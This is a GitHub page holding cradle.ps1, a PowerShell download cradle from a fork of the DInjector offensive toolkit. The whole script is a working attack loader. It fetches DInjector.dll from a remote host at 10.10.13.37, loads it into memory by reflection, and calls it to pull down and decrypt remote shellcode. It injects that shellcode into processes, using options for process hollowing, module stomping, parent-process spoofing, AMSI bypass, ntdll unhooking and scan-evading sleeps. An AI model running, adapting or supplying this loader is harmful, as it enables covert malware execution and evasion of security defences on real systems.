forked from rvrsh3ll/DInjector
-
Notifications
You must be signed in to change notification settings - Fork 0
/
cradle.ps1
119 lines (88 loc) · 4.36 KB
/
cradle.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
<#
.DESCRIPTION
Module name. Choose from:
"functionpointer",
"functionpointerunsafe",
"timeformats",
"clipboardpointer",
"currentthread",
"currentthreaduuid",
"remotethread",
"remotethreaddll",
"remotethreadview",
"remotethreadsuspended",
"remotethreadkernelcb",
"remotethreadapc",
"remotethreadcontext",
"processhollowing",
"modulestomping"
#>
$A = "currentthread"
# [/sc] lhost
$B = "10.10.13.37"
# [/sc] lport
$C = 80
# injector filename
$D = "DInjector.dll"
# [/sc] encrypted shellcode filename
$E = "enc"
# [/p] password to decrypt the shellcode
$F = "Passw0rd!"
# [/protect] protection value that will be applied to the memory region where the shellcode resides ("RX" / "RWX", used in "currentthread")
$G = "RX"
# [/timeout] timeout for WaitForSingleObject in milliseconds (0 is serve forever, used in "currentthread")
$H = 0
# [/flipSleep] time to sleep with PAGE_NOACCESS on shellcode memory region before resuming the thread in milliseconds (0 is disable memory protection flip, used in "currentthread" and "remotethreadsuspended")
$I = 0
# [/fluctuate] protection value to fluctuate with that will be applied to the memory region where the shellcode resides; this option also activates memory obfuscation ("RW", used in "currentthread")
$J = 0
# [/image] path to the image of a newly spawned process to inject into (used in "remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing" and "modulestomping")
# if there're spaces in the image path, replace them with asterisk (*) characters (e.g., C:\Program Files\Mozilla Firefox\firefox.exe -> C:\Program*Files\Mozilla*Firefox\firefox.exe)
$K = "C:\Windows\System32\svchost.exe"
# existing process name to inject into (used in "remotethread", "remotethreaddll", "remotethreadview", "remotethreadsuspended")
$L = "notepad"
# parent process name to spoof the original value (use "0" to disable PPID spoofing, used in "remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing" and "modulestomping")
$M = "explorer"
# [/dll] loaded module (DLL) name to overwrite its .text section for storing the shellcode (used in "remotethreaddll")
$N = "msvcp_win.dll"
# [/stompDll] name of the module (DLL) to stomp (used in "modulestomping")
$O = "xpsservices.dll"
# [/stompExport] exported function name to overwrite (used in "modulestomping")
$P = "DllCanUnloadNow"
# [/sleep] number of seconds (approx.) to sleep before execution to evade potential in-memory scan (10s-60s)
$Q = 0
# [/blockDlls] block 3rd-party DLLs ("True" / "False", used in "remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing" and "modulestomping")
$R = "True"
# [/am51] bypass AMSI for current process ("True" / "False" / "Force")
$S = "True"
# [/remoteAm51] bypass AMSI for remote process ("True" / "False" / "Force", used in "remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing" and "modulestomping", "remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing" and "modulestomping")
$T = "True"
# [/unhook] unhook ntdll.dll ("True" / "False")
$U = "False"
# [/debug] print debug messages ("True" / "False")
$V = "False"
# --------------------------------------------------------------------
$methods = @("remotethread", "remotethreaddll", "remotethreadview", "remotethreadsuspended")
if ($methods.Contains($A)) {
$L = (Start-Process -WindowStyle Hidden -PassThru $L).Id
}
$methods = @("remotethreadkernelcb", "remotethreadapc", "remotethreadcontext", "processhollowing", "modulestomping")
if ($methods.Contains($A)) {
try {
$M = (Get-Process $M -ErrorAction Stop).Id
# if multiple processes exist with the same name, arbitrary select the first one
if ($M -is [array]) {
$M = $M[0]
}
}
catch {
$M = 0
}
}
$cmd = "${A} /sc:http://${B}:${C}/${E} /p:${F} /protect:${G} /timeout:${H} /flipSleep:${I} /fluctuate:${J} /image:${K} /pid:${L} /ppid:${M} /dll:${N} /stompDll:${O} /stompExport:${P} /sleep:${Q} /blockDlls:${R} /am51:${S} /remoteAm51:${T} /unhook:${U} /debug:${V}"
$data = (IWR -UseBasicParsing "http://${B}:${C}/${D}").Content
$assem = [System.Reflection.Assembly]::Load($data)
$flags = [Reflection.BindingFlags] "Public,NonPublic,Static"
$class = $assem.GetType("DInjector.Detonator", $flags)
$entry = $class.GetMethod("Boom", $flags)
$entry.Invoke($null, (, $cmd))